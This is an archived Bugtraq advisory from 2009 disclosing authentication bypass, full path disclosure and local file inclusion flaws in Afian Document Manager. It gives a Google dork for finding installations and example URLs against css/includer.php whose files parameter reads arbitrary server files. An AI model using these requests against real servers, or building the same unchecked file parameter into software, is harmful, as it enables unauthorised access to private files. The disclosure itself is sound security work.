lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200902280346.n1S3kv3N025347@www3.securityfocus.com> Date: Fri, 27 Feb 2009 20:46:57 -0700 From: contact@...rain.net To: bugtraq@...urityfocus.com Subject: Afian Document Manager Local File Inclusion Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system. This software has a secutity hole allow attackers download any files if they know the path. Vendor: afian.com Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion. Version: Unknown (maybe 2.x.x) Demo: http://demo.afian.com Exploit: Google Dork: Afian document manager 1. Bypass+Fullpath Disclosure: http://site/path/css/includer.php?files=NOT_EXIST_FILE It doesn't ask username/password and display fullpath. 2. Local File Inclusion: Read any files if know exactly path_of_file http://site/path/css/includer.php?files=PATH_TO_FILE
Powered by blists - more mailing lists